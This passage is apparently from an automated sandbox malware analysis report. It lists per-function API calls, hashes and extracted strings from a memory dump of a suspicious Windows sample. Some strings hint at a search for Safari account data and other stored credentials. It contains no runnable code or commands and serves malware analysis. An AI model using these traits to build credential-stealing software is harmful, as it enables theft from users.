                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                                                                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                • API String ID: 2360000266-2664311388
                                                                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                APIs
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Version
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                APIs
                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                • memset.MSVCRT ref: 004132FB
